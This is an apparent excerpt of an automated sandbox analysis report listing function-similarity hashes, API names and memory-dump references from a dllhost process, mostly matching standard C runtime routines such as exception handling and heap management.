                                            • Instruction ID: a30abf28705b30cb2bb7f67a5455e38368b227ce8675dd05ac74ef9203fc145e
                                            • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction Fuzzy Hash: 78113D3661574093FB648F21E40865AE7B0FB48B80F044026DE4D037B5EFBDDA64C784
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction ID: c2647e53bafcc3c520f4da39f1fa9dd3b64026680bba084455ba5b0f11c15cd8
                                            • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction Fuzzy Hash: 87113D36705740D3EB248F21E40965AE7B0FB48B81F040026DE4D43BA5EFBDCA64C794
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2395640692-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: 56915b48f24458e82a99a47138cc162032089258724d0b34395af53a10b340e9
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: 3B51E2323297808AFB54CB15E44CB6CF795F358B98F158121DA4A477AADFB8CA61D700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2395640692-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: ed0ed71d99fc2e61bd7c1d0439e1bc7986960b626d9f5a6fcee59e3c3da8eb78
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: 3551E1323197008AFB54CB15E84CF6CF795F354B89F148129EA4A477AADFB9CA61C710
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000003.2869389293.0000020175E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020175E80000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_3_20175e80000_dllhost.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: a198b85ebc29dcc21cad61a09253dfcba2e215b7d950622c21f4c3a8916cd14e
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: 795190326847848AEB788F21D548368F7A0F354BA4F146115DA9987BE7CFB8F671CB01
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3544855599-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: f11ed8a5f89a24eb058d57883c88611e13664656c68c2db0a0e33ccb11f7d3d0
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: 8A619F72514BC485EB209F15F44879EF7A0F789B94F044219EB9857BAADFBCC2A0CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: 10287cf0550df9d29c0159fa5d85fb6cebf089bf33155172e6a5c0cc25d14994
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: FA516F322207808BFB748F25954C358F7A1F758B98F18411ADA9997BE6CFB8D670E701
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3544855599-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: 6f0942c97e7f1647706bddf2adfe751033534ba92b68f8f68c1d03ed379b97e5
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: BB619D72508BC485EB719F15E444B9EF7A0F785B99F044215EB9853BAADFB8C2A0CB10
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: f472994e0d258fc97a4479fc5cc62aeff46c6227a1ca346b31bfa673c04cf05d
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: E351A2322007808BEF768F21D588B58FBA1F354B96F184116DA9947BE6CFB8C670CB11
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID: pid_
                                            • API String ID: 517849248-4147670505
                                            • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction ID: d4569bfa2a1fcdb23e673d1b62a35a7239fdccd40947b7e51e8d84354c9e5b57
                                            • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction Fuzzy Hash: 9A11842132478192FB509B25E80935EE2A4F75CB80F9444259E4DC36EAEFB8DBA5D740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID: pid_
                                            • API String ID: 517849248-4147670505
                                            • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction ID: 8c89f960654431d9c0d7db2a3392d5579378b30a6b0fcbda03d635bf19327b93
                                            • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction Fuzzy Hash: 9B11967131078192FB109B25E81975AE3A4F748781F944025DE5983ABAEFB8CA65C750
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 2718003287-0
                                            • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction ID: 35d9c757ed0fe4513585bd4e539eadf52fd093e81546cb255a272ad5f18cd3aa
                                            • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction Fuzzy Hash: 31D1CB32714B8489E751CFA5D84829CB7B1F354B98F404216CE5EA7BEADFB5C226C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 2718003287-0
                                            • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction ID: e4d6be7033bb7708a749e4efd585d9d184a50702dd6aba70de56a6a075ca9b59
                                            • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction Fuzzy Hash: 5ED1FF32714B848AE710CFA9D4486DCB7B1F354B98F404216DE9EA7BAADF75C626C340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                             • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
                                            • Instruction ID: 5a1011d9486e765d7ba40cc25435cd7167fae03bd1d0927e1cf3db12c06e0eeb
                                            • Opcode Fuzzy Hash: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
                                            • Instruction Fuzzy Hash: 2A0132B2610A808AE705EF67B80438977A0F78CFC0F4A4525FB5953B39CE38D091C744
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction ID: 542879774d4b37c2c4f6158ed6293d434182db9028bc110ba96dcc62d4610a63
                                            • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction Fuzzy Hash: 6C012932610F90DAE754DF66E808149FBA1F79CF81B094026DF4953769EF74E6A1C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction ID: 99e6de93c42aa89ec951b0637f104e7ca98908024865756e2a0519541f22cf4a
                                            • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction Fuzzy Hash: 9001E532610F90DAE718DF66E808669F7A1F788F81F0A4026DF4953729EF78D6A1C740
                                            APIs
                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000020175EF28DF), ref: 0000020175EF2A12
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ConsoleMode
                                            • String ID:
                                            • API String ID: 4145635619-0
                                            • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction ID: 2943d4b894f46439057ee3381a6a045c2eaac7cdd1918a51021215eadbf17b98
                                            • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction Fuzzy Hash: DA91F332B10B5489FBA0CF659C583ADFBA1F354B88F444106DE4A57AE6DFB6C666C300
                                            APIs
                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000020175EC28DF), ref: 0000020175EC2A12
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ConsoleMode
                                            • String ID:
                                            • API String ID: 4145635619-0
                                            • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction ID: 26772c4d82cf41c12228213bcd18c72309a7f25052ca1e140cd0dcfae6c9c3fd
                                            • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction Fuzzy Hash: 29914432B1075089FB60CF7594587ADFBA1F344B88F444106DE8A67BA6DFB6C6A6C300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                            • String ID:
                                            • API String ID: 2933794660-0
                                            • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction ID: 7ed6f03d52861d04c310d88f82d51a1832d1823d58d146f039ccb8b505fb4643
                                            • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction Fuzzy Hash: 7F110C26711F048AFB40CF60E8593A9B3A4F759758F441E25DA6D877A5EFB8C264C340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                            • String ID:
                                            • API String ID: 2933794660-0
                                            • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction ID: 32dcd197e1c764250b7da0992c6fa0927721785564f3d360bd14f6da7c4201f8
                                            • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction Fuzzy Hash: 20115E26711F048AEB00CF64E8593A8B3B4F719768F441E25DA6D867B5EFB8C2A4C340
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction ID: a4586d7c92c90f226e636855f1f3be765008ca7c422b7c4e292e15bf223d306c
                                            • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction Fuzzy Hash: D271C332620B8142F7749F2AA8583EAE794F38CB84F44401ADD0943BAADFB6C720D740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000003.2869389293.0000020175E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020175E80000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_3_20175e80000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3242871069-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: 240b348ba591aa1e5b19340637ea0787a91ff7119cff276b9cd25c82989e8642
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: BA51E332359B008AFB54CF15E448B6DF392F344B88F15A921DE46437AADFB8EA61C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000003.2869389293.0000020175E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020175E80000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_3_20175e80000_dllhost.jbxd
                                            Similarity
                                            • API ID: CallTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3163161869-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
